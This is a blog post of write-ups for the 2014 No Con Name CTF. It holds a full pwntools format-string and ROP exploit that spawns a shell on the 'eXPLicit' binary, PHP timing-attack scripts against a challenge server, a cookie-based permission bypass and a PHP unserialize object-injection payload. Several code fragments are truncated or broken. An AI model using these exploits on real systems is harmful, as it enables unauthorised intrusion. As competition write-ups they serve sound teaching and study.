Monday, September 15, 2014

inBINcible

inBINcible (solved by souhail)
Write-up

No Con Name

eXPLicit

eXPLicit (not solved) source
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
from pwn import *
from libformatstr import *

# Target selection: set REMOTE to 1 to talk to the challenge server instead
# of a local instance.  The port is identical in both cases.
REMOTE = 0

host = '88.87.208.163' if REMOTE else '127.0.0.1'
port = 7070

def connect():
    """Open a pwntools tube to the module-level `host`/`port` and return it."""
    target = (host, port)
    return remote(*target)

def retrieve_val(res):
    """Extract the echoed value from the service's "too low" reply.

    res: text received from the service after a guess was sent.
    Returns the text captured between 'Your number is ' and
    ' which is too low.', or None when the reply does not contain it.
    """
    match = re.search('Your number is (.+) which is too low.', res)
    return match.group(1) if match else None

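def dump_stack(count=100):
    """Print what the service echoes for positional arguments 1..count-1.

    For every index i the string '%<i>$x' is sent as the "number" and the
    value the service reflects back is printed as 'i: value'.  When the
    reply does not contain the expected sentence, the raw reply is printed
    instead so the miss is visible.  Uses the module-level tube `s` and
    hands the session to s.interactive() at the end.

    count: one past the last index probed (default 100, as before).
    """
    for i in range(1, count):
        payload = '%%%d$x\n' % i
        s.sendafter('Pick a number between 0 and 20: ', payload)
        res = s.recvuntil('which is too low.')
        leak = retrieve_val(res)
        if leak:
            print '%d: %s' % (i, leak)
        else:
            # `res` is the reply we just read; the module-level `buf` does
            # not exist yet at this point of the script.
            print res
    s.interactive()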

def send_fmt(payload):
    """Send `payload` as the guessed number (newline-terminated) on the shared tube `s`."""
    line = payload + '\n'
    s.sendafter('Pick a number between 0 and 20: ', line)

# Writable scratch area (0x100 into .bss) used below to stage the execve
# path and argv array.
bss = 0x80d6080 + 0x100

# Gadget addresses in the challenge binary, as recorded by the author.
int80, popeax, popecx_ebx, popedx_ecx_ebx = (
    0x8082715,  # int 0x80; ret
    0x80a8ff6,  # pop eax; ret
    0x8060a7d,  # pop ecx; pop ebx; ret
    0x8060a7c,  # pop edx; pop ecx; pop ebx; ret
)

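def _write_words(base, words):
    """Write `words` as consecutive 4-byte cells starting at address `base`.

    Each entry is an int (one dword) or a 4-character string, the two
    forms the original chains hand to libformatstr's FormatStr.  The
    resulting format string is sent with the same argument index (6) that
    every chain in this script uses.
    """
    p = FormatStr()
    for i, word in enumerate(words):
        p[base + 4*i] = word
    send_fmt(p.payload(6))


s = connect()

# dump_stack()  # uncomment to print the positional-argument leaks first

# Leak a stack value through positional argument 69 and derive the address
# of the saved return address from it (the -76 offset was determined by the
# author for this binary).
send_fmt('%69$x')
buf = s.recvuntil('which is too low.')
leak = retrieve_val(buf)
if leak is None:
    # Without the leak every address below is garbage; stop instead of
    # letting int(None, 16) raise a less helpful TypeError.
    log.error('no leak in reply: %r' % buf)
    sys.exit(1)
retaddr = int(leak, 16) - 76 # offset
log.info('retaddr = %x' % retaddr)

# dup2(4, 0): eax = 0x3f, ecx = 0 (newfd), ebx = 4 (oldfd)
_write_words(retaddr, [popeax, 0x3f, popecx_ebx, 0, 0x4, int80])
retaddr += 4*6

# dup2(4, 1): same gadgets, ecx = 1 this time (the comment in the original
# said dup2(4, 0) twice; the second chain's newfd is 1).
_write_words(retaddr, [popeax, 0x3f, popecx_ebx, 1, 0x4, int80])
retaddr += 4*6

# execve("/bin/sh", ["/bin/sh", NULL], NULL):
# eax = 0x0b, edx = 0 (envp), ecx = bss+4 (argv), ebx = bss+12 (path)
_write_words(retaddr, [popeax, 0x0b, popedx_ecx_ebx, 0, bss+4*1, bss+4*3, int80])

# Stage the data execve reads: argv = ["/bin/sh", NULL] at bss+4 and the
# NUL-terminated path "/bin/sh" at bss+12.
_write_words(bss, [retaddr+4*1, bss+4*3, 0, '/bin', '/sh\0'])

s.interactive()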


proMISCuous

proMISCuous (solved by kami)

   

 [".$morrey."]";
				$all[$char]=$morrey; //save all in array
		}

$cracked=array_search(max($all), $all); // $key = 2; compare max value
$final .=$cracked;// save max delai in one table

// echo  $final."\n"; Disable debugging

 unset($all);
}

// Send the recovered value to the service and print its answer.
// NOTE(review): this sends $cracked (the last character chosen above), not
// the accumulated $final — verify that is the intended value.
$fp = fsockopen($host, $port);
fwrite($fp, $cracked);
$resultat = fgets($fp, 80) . "\n";
echo $resultat;


?>



tIMeMaTTerS
NcN_15d07db12cd83174f0d19ce7e8c65a7c5ffba7df Another exploit :
$val){  
                $sock = fsockopen("88.87.208.163", "6969");  
                $start =microtime(true);  
                fwrite($sock, $str.$val."\n");  
                $result=fgets($sock,1080);  
                $end  =microtime(true);  
                $arr[]=($end-$start);  
           }  
           $str.=$char[array_search(max($arr), $arr)];  
           echo $char[array_search(max($arr), $arr)];  
      }  
 ?>  

STEGOsaurus

http://en.wikipedia.org/wiki/Hearing_range#Humans

human hearing is 20 Hz to 20 kHz

I tried removing the voice with Audacity.

Audacity effect Vocal Remover: set the frequencies between 20 and 20000, and Removal choice: Remove Frequency band.
Then converted the Morse to ASCII manually.

WEBster

WEBster (solved by kami)

Log in as test/test.
Bypass the permission control using loc=md5(127.0.0.1).

GET https://ctf.noconname.org/webster/content.php?op=4 HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/webster/
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=9jmjodd20igc7svk7inmo350k4; loc=f528764d624db129b32c21fbca0cb8d6
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

Crypto spanish-book

Crypto (solved by kami)

file = open('spanish-book.enc', 'r')
content = file.read()

List1=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z",",","_","!",".","-",")","(",";","?",":"]
        List2=["b","s","a","d","x","F","g","H","n","J","K","l","t","m","O","u","c","d","s","T","i","V","W",",","Y","Z","q","e","o","p","g","r","(","v","f","b"]

for (x,y) in zip(List1,List2):
    content.replace(x,y)
print content


pareciendole que aquella era propia desgracia de caballeros
andantesA g toda la atribuia a la falta de su caballod g no era
posible levantarseA segun tenia abrumado todo el cuerpos


     capitulo quinto

     donde se prosigue la narracion de la desgracia de nuestro
caballero

ncnJdeadbeafcafebadbabefeeddefacedbedfadedecviendoA puesA que en
efecto no podia menearseA acordo de acogerse a su ordinario
remedioA que era pensar en algun paso de sus librosA g traVole
su colera a la memoria aquel de baldovinos g del marques de


 https://gist.github.com/rekkusu/47e369c3f74342970c31

MakeMeFeeWet^Hb

Makemefeelweb( solved by kami)

GET /makemefeelweb/index.php HTTP/1.1
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/login.php
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

Hint comment found at the top of the page (Emacs config):

<!-- vim: set ts=2 sw=2: -->  <== HINT: already checked it; I think it means tabstop=2 and shiftwidth=2, i.e. the tab width and the code indent width.



<html>
<head>
        <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
        <script src="assets/jquery-1.11.1.min.js"></script>
        <script src="assets/bootstrap/js/bootstrap.min.js"></script>
        <title>WUT</title>
</head>
t's emac vuln

Here is an incomplete backup: https://ctf.noconname.org/makemefeelweb/.login.php.swp

@$data = unserialize(hex2bin(implode(explode("\\x", base64_decode($cookie)))));

           if (isset($_COOKIE['JSESSIONID'])) {        
        if ($username == "p00p" && $password == "l!k34b4u5") {           }                 }              
        $this->p = $_passwd;                 $this->u = $_uname;              
     

     
        class Creds {
        public function __construct($_uname, $_passwd) {
        public $p;
        public $u;

Exploit :

// Object whose serialized form sets both credential fields to true; it is
// hex-encoded and then base64-encoded to match how the page decodes its cookie.
class Creds {
    public $p = true;
    public $u = true;
}

$exploit = new Creds;
echo base64_encode(bin2hex(serialize($exploit)));


POST https://ctf.noconname.org/makemefeelweb/login.php HTTP/1.1
Content-Length: 30
Pragma: no-cache
Referer: https://ctf.noconname.org/makemefeelweb/
Host: ctf.noconname.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=NGYzYTM1M2EyMjQzNzI2NTY0NzMyMjNhMzIzYTdiNzMzYTMxM2EyMjcwMjIzYjYyM2EzMTNiNzMzYTMxM2EyMjc1MjIzYjYyM2EzMTNiN2Q=
username=p00p&passwd=l!k34b4u5

NcN_7780*************************eba1578

MISCall

MISCall (solved by kami)

I set up the git repository, then applied the stashed changes to be committed (we get an s.py):

# git stash pop

# On branch master
# Changes to be committed:
#   (use "git reset HEAD <file>..." to unstage)
#
#       new file:   s.py
#
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#       modified:   flag.txt
#
Dropped refs/stash@{0} (1f824bb78af66d27d88d6b0de8a58e975061665e)
# ls
flag.txt  s.py
root@ks3283938:/var/www/kami.ma/web/ctf# cat s.py
#!/usr/bin/env python
from hashlib import sha1
with open("flag.txt", "rb") as fd:
    # SHA-1 of the raw file bytes, hex-encoded
    digest = sha1(fd.read()).hexdigest()
print("NCN" + digest)

python s.py
NCN4dd992213ae6b76f27d7340f0dde1222888df4d3